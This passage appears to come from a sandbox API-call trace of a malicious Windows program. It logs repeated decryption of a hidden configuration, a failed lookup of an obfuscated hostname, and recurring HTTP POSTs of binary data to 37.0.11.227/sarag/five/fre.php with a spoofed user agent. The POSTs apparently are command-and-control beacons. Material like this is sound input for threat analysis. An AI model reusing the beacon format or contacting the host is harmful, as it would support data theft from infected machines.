pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0255.232] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.232] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0255.233] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.233] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0255.234] GetProcessHeap () returned 0x690000 [0255.234] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0255.234] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0255.235] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0255.235] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0255.236] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0255.236] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0255.237] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0255.237] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0255.238] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0255.238] GetProcessHeap () returned 0x690000 [0255.238] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0255.238] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0255.238] GetProcessHeap () returned 0x690000 [0255.238] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab390 [0255.238] socket (af=2, type=1, protocol=6) returned 0x740 [0255.238] connect (s=0x740, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0255.266] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0255.266] GetProcessHeap () returned 0x690000 [0255.266] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aedd0 [0255.266] GetProcessHeap () returned 0x690000 [0255.266] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0255.267] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0255.268] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0255.268] GetProcessHeap () returned 0x690000 [0255.268] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afa40 [0255.268] GetProcessHeap () returned 0x690000 [0255.269] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0255.269] GetProcessHeap () returned 0x690000 [0255.269] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4460 [0255.269] GetProcessHeap () returned 0x690000 [0255.269] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0255.270] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0255.271] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0255.271] GetProcessHeap () returned 0x690000 [0255.271] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0255.271] GetProcessHeap () returned 0x690000 [0255.271] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0255.272] send (s=0x740, buf=0x6ad508*, len=242, flags=0) returned 242 [0255.277] send (s=0x740, buf=0x6aba40*, len=159, flags=0) returned 159 [0255.277] GetProcessHeap () returned 0x690000 [0255.277] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0255.277] recv (in: s=0x740, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0255.354] GetProcessHeap () returned 0x690000 [0255.354] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0255.354] GetProcessHeap () returned 0x690000 [0255.354] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0255.355] GetProcessHeap () returned 0x690000 [0255.355] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afa40 | out: hHeap=0x690000) returned 1 [0255.356] GetProcessHeap () returned 0x690000 [0255.356] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aedd0 | out: hHeap=0x690000) returned 1 [0255.356] closesocket (s=0x740) returned 0 [0255.356] GetProcessHeap () returned 0x690000 [0255.356] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab390 | out: hHeap=0x690000) returned 1 [0255.356] GetProcessHeap () returned 0x690000 [0255.357] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0255.357] GetProcessHeap () returned 0x690000 [0255.357] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0255.357] GetProcessHeap () returned 0x690000 [0255.358] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0255.358] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x14dc) returned 0x740 [0255.359] Sleep (dwMilliseconds=0xea60) [0255.362] GetProcessHeap () returned 0x690000 [0255.362] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4460 [0255.362] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.363] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0255.367] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.367] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0255.376] GetProcessHeap () returned 0x690000 [0255.376] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0255.377] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.377] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0255.378] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.379] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0255.379] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.380] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0255.380] GetProcessHeap () returned 0x690000 [0255.380] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0255.381] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.382] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4460, pdwDataLen=0x19fcfc | out: pbData=0x6a4460, pdwDataLen=0x19fcfc) returned 1 [0255.382] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.383] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0255.384] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.384] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0255.384] GetProcessHeap () returned 0x690000 [0255.384] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0255.385] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0255.385] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0255.386] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0255.386] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0255.387] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0255.387] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0255.388] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0255.388] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0255.388] GetProcessHeap () returned 0x690000 [0255.388] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0255.388] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0255.389] GetProcessHeap () returned 0x690000 [0255.389] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0255.389] GetProcessHeap () returned 0x690000 [0255.389] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0255.400] GetProcessHeap () returned 0x690000 [0255.400] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0255.400] GetProcessHeap () returned 0x690000 [0255.400] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0255.401] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.402] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0255.409] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.409] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0255.414] GetProcessHeap () returned 0x690000 [0255.414] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0255.414] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.424] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0255.425] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.426] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0255.426] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.426] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0255.426] GetProcessHeap () returned 0x690000 [0255.427] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0255.428] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.428] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0255.429] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.429] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0255.430] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.430] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0255.430] GetProcessHeap () returned 0x690000 [0255.430] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0255.430] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0255.431] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0255.431] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0255.432] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0255.432] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0255.432] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0255.433] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0255.433] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0255.433] GetProcessHeap () returned 0x690000 [0255.433] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0255.434] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0255.434] GetProcessHeap () returned 0x690000 [0255.434] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4b0 [0255.434] socket (af=2, type=1, protocol=6) returned 0x744 [0255.436] connect (s=0x744, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0255.461] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0255.462] GetProcessHeap () returned 0x690000 [0255.462] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0255.462] GetProcessHeap () returned 0x690000 [0255.462] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0255.462] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0255.463] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0255.464] GetProcessHeap () returned 0x690000 [0255.464] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afb00 [0255.464] GetProcessHeap () returned 0x690000 [0255.464] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0255.464] GetProcessHeap () returned 0x690000 [0255.464] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4460 [0255.464] GetProcessHeap () returned 0x690000 [0255.464] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0255.465] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0255.466] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0255.466] GetProcessHeap () returned 0x690000 [0255.466] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0255.466] GetProcessHeap () returned 0x690000 [0255.467] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0255.467] send (s=0x744, buf=0x6ad508*, len=242, flags=0) returned 242 [0255.467] send (s=0x744, buf=0x6aba40*, len=159, flags=0) returned 159 [0255.467] GetProcessHeap () returned 0x690000 [0255.467] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0255.467] recv (in: s=0x744, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0255.541] GetProcessHeap () returned 0x690000 [0255.542] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0255.542] GetProcessHeap () returned 0x690000 [0255.543] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0255.543] GetProcessHeap () returned 0x690000 [0255.543] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afb00 | out: hHeap=0x690000) returned 1 [0255.544] GetProcessHeap () returned 0x690000 [0255.544] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0255.544] closesocket (s=0x744) returned 0 [0255.545] GetProcessHeap () returned 0x690000 [0255.545] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4b0 | out: hHeap=0x690000) returned 1 [0255.545] GetProcessHeap () returned 0x690000 [0255.545] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0255.545] GetProcessHeap () returned 0x690000 [0255.545] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0255.545] GetProcessHeap () returned 0x690000 [0255.546] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0255.546] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x14e0) returned 0x744 [0255.548] Sleep (dwMilliseconds=0xea60) [0255.550] GetProcessHeap () returned 0x690000 [0255.550] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0255.550] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.551] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0255.560] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.561] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0255.567] GetProcessHeap () returned 0x690000 [0255.567] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0255.568] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.568] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0255.571] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.571] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0255.571] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.572] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0255.572] GetProcessHeap () returned 0x690000 [0255.572] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0255.573] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.573] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0255.574] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.574] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0255.575] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.575] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0255.575] GetProcessHeap () returned 0x690000 [0255.575] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0255.576] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0255.576] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0255.576] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0255.577] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0255.577] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0255.578] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0255.578] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0255.578] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0255.586] GetProcessHeap () returned 0x690000 [0255.586] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0255.586] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0255.586] GetProcessHeap () returned 0x690000 [0255.586] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0255.587] GetProcessHeap () returned 0x690000 [0255.587] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0255.587] GetProcessHeap () returned 0x690000 [0255.587] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0255.587] GetProcessHeap () returned 0x690000 [0255.587] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0255.588] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.588] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0255.593] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.593] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0255.601] GetProcessHeap () returned 0x690000 [0255.601] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0255.601] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.604] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0255.605] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.605] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0255.606] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.606] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0255.606] GetProcessHeap () returned 0x690000 [0255.607] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0255.608] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.608] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0255.609] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.609] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0255.610] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0255.610] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0255.610] GetProcessHeap () returned 0x690000 [0255.610] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0255.611] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0255.611] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0255.612] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0255.612] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0255.615] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0255.616] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0255.616] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0255.616] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0255.617] GetProcessHeap () returned 0x690000 [0255.617] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 